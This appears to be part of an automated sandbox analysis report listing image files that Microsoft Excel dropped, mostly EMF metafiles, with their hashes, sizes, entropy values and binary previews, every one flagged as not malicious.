          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
          MD5:573220372DA4ED487441611079B623CD
          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
          Malicious:false
          Reputation:high, very likely benign file
          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):153132
          Entropy (8bit):2.345313426624281
          Encrypted:false
          SSDEEP:1536:QA/UfH+DAtQaqrUPig97qG7bIQWkaYgJ/BXv6xU3ha:EPoBXv6i3ha
          MD5:0D07E0C1D20745CDBBFE5082E76EA070
          SHA1:41D28E4E24D1E1E778BC9469D3CF945C63AB6766
          SHA-256:0B1258021A9436EB87FECF28B44FA7643C604E71217D1459C1F12226DE727CC9
          SHA-512:978A4493176B16507E369654FF060CACE16C4F3C9D0079D2FF2CDAF966D1EAC7C7F5AF9536668E276BDC702BDCA5ADAC4861AC2A600911CC0A86F4E297F0049E
          Malicious:false
          Reputation:low
          Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.134027179798306
          Encrypted:false
          SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
          MD5:331C2C9C442C76A749D84D57B5515818
          SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
          SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
          SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
          Malicious:false
          Reputation:low
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):13444
          Entropy (8bit):2.175518136232734
          Encrypted:false
          SSDEEP:96:tgk+uuRwgQDG4+TB3f6lQlpJbp0HWSj0ToYb4IzV:ZGHyTj0/b9
          MD5:46F1630781E671AA1C6BFB64C9F80272
          SHA1:D2EAEBFED507FDAD429F4D37B17557211D142907
          SHA-256:6D71ED6E7491F3E625F3DE76F793B49604C330B01D71843EBDB043F0974DD62B
          SHA-512:755C16DA2441CC0DFA3F97690913EB7F9EAF574F57D8F07DA0B95D3B8AD030D386E7CD45347393BE3FDB2FA54AB514F87B1C75F1FF8F1D70D10CAAE1FCA3947E
          Malicious:false
          Preview:....l...........................|,..\... EMF.....4..U...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i...........................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):1293620
          Entropy (8bit):4.563127917199792
          Encrypted:false
          SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
          MD5:F71C973B5E362DFD6408D6C009E5643E
          SHA1:24B3CE67B31BFD4791287932206D54C73489424E
          SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
          SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
          Malicious:false
          Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):13372
          Entropy (8bit):2.1748870819083224
          Encrypted:false
          SSDEEP:96:Xgk+uu/p2KSHG5+/B3L3lZpJbp0HWSj0ToYb4IzV:hGa7uj0/b9
          MD5:C981DE873AC21128BE90F74AE64AD37A
          SHA1:09C7A7B2502A5B9B6B5636A3260A41BC35465C3C
          SHA-256:EBE365678371D2392B80FB7A7DDE3677E1D55DBB30E4CF2BF4DC8E65BA08DE88
          SHA-512:DEF903A44BA3C8281F8867081655A6356D038E497EAED273E92DE6799051F28F95ECAA3D9F52A287030D1837DA877D25B81288C0144F5DF5DE6A6631A7304C88
          Malicious:false
          Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i...........................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):13284
          Entropy (8bit):2.735825271732709
          Encrypted:false
          SSDEEP:96:9pyRiCCyynOYeK4jlGWS0BL7g5lqUTM/tIdSUsQ5lV:9rR/W305sUTMpQR
          MD5:901DCD18F7643CAEBDE4301E05F5C748
          SHA1:A0ABDDACFFDE3CCF88AA4CBC6F7B252385745BA4
          SHA-256:BBE8A43E3E499CE8744B1C8680300A8C4EAD33C08EE82CC4D59624C0BB871FB1
          SHA-512:ADF5729E56F94556E7C979202C75FC1B051B3D9B7B30344C6E9DFE0F5164B3D30554505DC1E9BB8C6319A50436B533EAC7021CC030E040659D02C0616EE3A743
          Malicious:false
          Preview:....l...........#...V...........Z&...... EMF.....3..K.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W...R...p.................................. C.a.l.i.b.r.i......................................................................................../....(....../...................._...(...................N../.............m./L...............L....................../........\........./
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):13372
          Entropy (8bit):2.1748870819083224
          Encrypted:false
          SSDEEP:96:Xgk+uu/p2KSHG5+/B3L3lZpJbp0HWSj0ToYb4IzV:hGa7uj0/b9
          MD5:C981DE873AC21128BE90F74AE64AD37A
          SHA1:09C7A7B2502A5B9B6B5636A3260A41BC35465C3C
          SHA-256:EBE365678371D2392B80FB7A7DDE3677E1D55DBB30E4CF2BF4DC8E65BA08DE88
          SHA-512:DEF903A44BA3C8281F8867081655A6356D038E497EAED273E92DE6799051F28F95ECAA3D9F52A287030D1837DA877D25B81288C0144F5DF5DE6A6631A7304C88
          Malicious:false
          Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i...........................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):13372
          Entropy (8bit):2.1748870819083224
          Encrypted:false
          SSDEEP:96:Xgk+uu/p2KSHG5+/B3L3lZpJbp0HWSj0ToYb4IzV:hGa7uj0/b9
          MD5:C981DE873AC21128BE90F74AE64AD37A
          SHA1:09C7A7B2502A5B9B6B5636A3260A41BC35465C3C
          SHA-256:EBE365678371D2392B80FB7A7DDE3677E1D55DBB30E4CF2BF4DC8E65BA08DE88
          SHA-512:DEF903A44BA3C8281F8867081655A6356D038E497EAED273E92DE6799051F28F95ECAA3D9F52A287030D1837DA877D25B81288C0144F5DF5DE6A6631A7304C88
          Malicious:false
          Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i...........................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):150296
          Entropy (8bit):2.37077284429717
          Encrypted:false
          SSDEEP:1536:eo5iNNeZQJYAkQDnGvVf1oLJknhmUI/Fe5/nCmLcir:oox5/nCqcir
          MD5:E93D607A35A561211F1EBCD81040E086
          SHA1:909325A69861C700A7C5118B8C98DB1457108728
          SHA-256:5CA964C4CD21A59AB7E0379AB75822B5E2FD8954107E0AE0176F31908D8B4400
          SHA-512:D9E372F322ADE15F92BDE6A45609525B9BCCF05EB03213B62A166A8F62003C66190DA5D02405138C54C124535C221CCD82D40FDDA5E36FED0AED5DC0710E44DB
          Malicious:false
          Preview:....l...........................Z....G.. EMF.....K..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.3146858690534673
          Encrypted:false
          SSDEEP:768:XOU4vdx1DW7ohBb66mQK4BTonxqQbApQK6c:+5wc
          MD5:CFAA73290044E624A73BAC9B0EA4850E
          SHA1:ABFC1ADAC891C8621C8F73F1ABA3A9292E18D54C
          SHA-256:3272107F4C00B6057E1F11EAFF43FCCC4BBD459FB671591F164639F4D919F235
          SHA-512:0474CC4960A60609DE1C2773747B457857FA2BBD3E27064B59623D0D0006C63BFD4AEA945D57B921D1C78F279C539387DC30FA0FB05955116E871537D9B632AD
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):134544
          Entropy (8bit):2.9527588414114754
          Encrypted:false
          SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
          MD5:83F48FDD46D3424E92E24E709EAB5960
          SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
          SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
          SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
          Malicious:false
          Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................@...............8/....X.....8/........................X...................N.8/@....y8/.....m8/|...............|.....................8/.................8/
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.134027179798306
          Encrypted:false
          SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
          MD5:331C2C9C442C76A749D84D57B5515818
          SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
          SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
          SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):44256
          Entropy (8bit):3.147465798679962
          Encrypted:false
          SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
          MD5:36D8FF25D14E7E2FBB1968E952FF9C17
          SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
          SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
          SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
          Malicious:false
          Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):44256
          Entropy (8bit):3.15066292565687
          Encrypted:false
          SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
          MD5:F1EC2E98B0F577B675156B13DCF94105
          SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
          SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
          SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
          Malicious:false
          Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.3170971019030073
          Encrypted:false
          SSDEEP:768:XOIIvkx1DW7ohBb66mQK4BTo08QbApQKcc:+g7c
          MD5:D7210F648BAE783614F73E6564C18237
          SHA1:C8C9B5CE3CC070BC0B7CB5D82D149725EAFCFDF6
          SHA-256:2C565F9C97CF0D34C923E5FEA9E22849C10CD416B0C203434ED6AFD32A7AE08D
          SHA-512:884BAA7A4A523176370C292D3E18DF6B6F52800F6D68DD4F875A22D40FB9400E5A11714A3A8090B3E7C10953FC518E28E1E0169FE8D153D9BE90BEB05E6395A3
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):149960
          Entropy (8bit):2.367197743525156
          Encrypted:false
          SSDEEP:1536:3NkRz0eZQJYAkQDnGvVf1oLJknhmUI/Fe/ZGk8w3HZ:AHx/ZGkj3HZ
          MD5:517B432F97742DA08D90DDDB35976ACF
          SHA1:52489D80513911EB7212222874AE7E3F267672CC
          SHA-256:B03C102E7E96A2DDB5E7AF25C95069577D17B722C02CE5C3EC41DF38DB0AFA7C
          SHA-512:220273DBFD49657BAF1EBE5E041AD44C305A9CDB26C007E5C0DE42A05963FE40ED339F3A59E34D2DBE76873890570068955C9DFB9839AF9BB4F5794673A1D827
          Malicious:false
          Preview:....l...........................Z....G.. EMF.....I..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.3170971019030073
          Encrypted:false
          SSDEEP:768:XOIIvkx1DW7ohBb66mQK4BTo08QbApQKcc:+g7c
          MD5:D7210F648BAE783614F73E6564C18237
          SHA1:C8C9B5CE3CC070BC0B7CB5D82D149725EAFCFDF6
          SHA-256:2C565F9C97CF0D34C923E5FEA9E22849C10CD416B0C203434ED6AFD32A7AE08D
          SHA-512:884BAA7A4A523176370C292D3E18DF6B6F52800F6D68DD4F875A22D40FB9400E5A11714A3A8090B3E7C10953FC518E28E1E0169FE8D153D9BE90BEB05E6395A3
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8184
          Entropy (8bit):2.134027179798306
          Encrypted:false
          SSDEEP:96:EV5g2s88nDfgs/I5i9OWZBKlA2B79sIRdYZgmR7qii1Bo1V:EaoRfWZ4V79FdigmR7qii1Bo
          MD5:331C2C9C442C76A749D84D57B5515818
          SHA1:E754B0650D15D892EEC8B24DA991AED1290B5D96
          SHA-256:D9BF530C063351C003E3CCFF707D0A25C27BE3E00F225AEFE46099B8BA450C2F
          SHA-512:62302CABE9FB5749ED6B1DDDBF539DB50044E6619571F9E0B7E2FFD05D4ECC6717DE080405DED6CE84712DC3D4E8B6FD423ADE32BBB45144DE3777EFC73CD2D6
          Malicious:false
          Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8084
          Entropy (8bit):2.5551694039574895
          Encrypted:false
          SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
          MD5:721E8AAC81F0A6D4659831CB8194D668
          SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
          SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
          SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
          Malicious:false
          Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):98872
          Entropy (8bit):2.3170971019030073
          Encrypted:false
          SSDEEP:768:XOIIvkx1DW7ohBb66mQK4BTo08QbApQKcc:+g7c
          MD5:D7210F648BAE783614F73E6564C18237
          SHA1:C8C9B5CE3CC070BC0B7CB5D82D149725EAFCFDF6
          SHA-256:2C565F9C97CF0D34C923E5FEA9E22849C10CD416B0C203434ED6AFD32A7AE08D
          SHA-512:884BAA7A4A523176370C292D3E18DF6B6F52800F6D68DD4F875A22D40FB9400E5A11714A3A8090B3E7C10953FC518E28E1E0169FE8D153D9BE90BEB05E6395A3
          Malicious:false
          Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):109544
          Entropy (8bit):4.282675970330063
          Encrypted:false
          SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
          MD5:F7B9A8F20E64B2CB6B572BCBA5866236
          SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
          SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
          SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
          Malicious:false
          Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):13372
          Entropy (8bit):2.1472761630794444
          Encrypted:false
          SSDEEP:96:Xgk+uu1vSZbSG3+LB3mTlvpJbp0HWSj0ToYb4IzV:WGEGUj0/b9
          MD5:1325AB5ABFCEA11BADA068E10ECB102A
          SHA1:C6EBC46C24B9E4876CACE9052F9D2EF34FFB746B
          SHA-256:D5D9AAD55F4887FA8EBD6AFA6AB9FE42D51B26FF6FFBF17F7CC2D645C8828958
          SHA-512:4277CD8063BA8282A16E550046CD43C44C46FA33E8649B39F4D3D42A32077C73F9021BC2D1F937C9A4351B6DC9C129BAD1F4DABB0B38BE548BC32B411B1ABFBD
          Malicious:false
          Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i...........................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):8208
          Entropy (8bit):2.1443122661369287
          Encrypted:false
          SSDEEP:96:Eeg2s88nDfghmM5U9eWZBKlA2B79sIRdYZgmR7qii1Bo1V:E/oV5WZ4V79FdigmR7qii1Bo
          MD5:43883BF58B496283385419C61AA4F814
          SHA1:155EA3026B137876021B7DA35B46875CABFE582A
          SHA-256:497EC9E8409BF6F0B0ACF853A5153C84E34D8398DFA30E77CE83B0152F2F1466
          SHA-512:71F15579521C09E141B17A713F8A0FEF3E38DA49842822C71AD1AA83B40FE8CC1850D011F5254A14EB8AE4FDFF178EAC80AB70FAA2069286E8B3A78F17040ADB
          Malicious:false
          Preview:....l...........{...U............A...... EMF..... ..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):153132
          Entropy (8bit):2.345313426624281
          Encrypted:false
          SSDEEP:1536:QA/UfH+DAtQaqrUPig97qG7bIQWkaYgJ/BXv6xU3ha:EPoBXv6i3ha
          MD5:0D07E0C1D20745CDBBFE5082E76EA070
          SHA1:41D28E4E24D1E1E778BC9469D3CF945C63AB6766
          SHA-256:0B1258021A9436EB87FECF28B44FA7643C604E71217D1459C1F12226DE727CC9
          SHA-512:978A4493176B16507E369654FF060CACE16C4F3C9D0079D2FF2CDAF966D1EAC7C7F5AF9536668E276BDC702BDCA5ADAC4861AC2A600911CC0A86F4E297F0049E
          Malicious:false
          Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
          Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
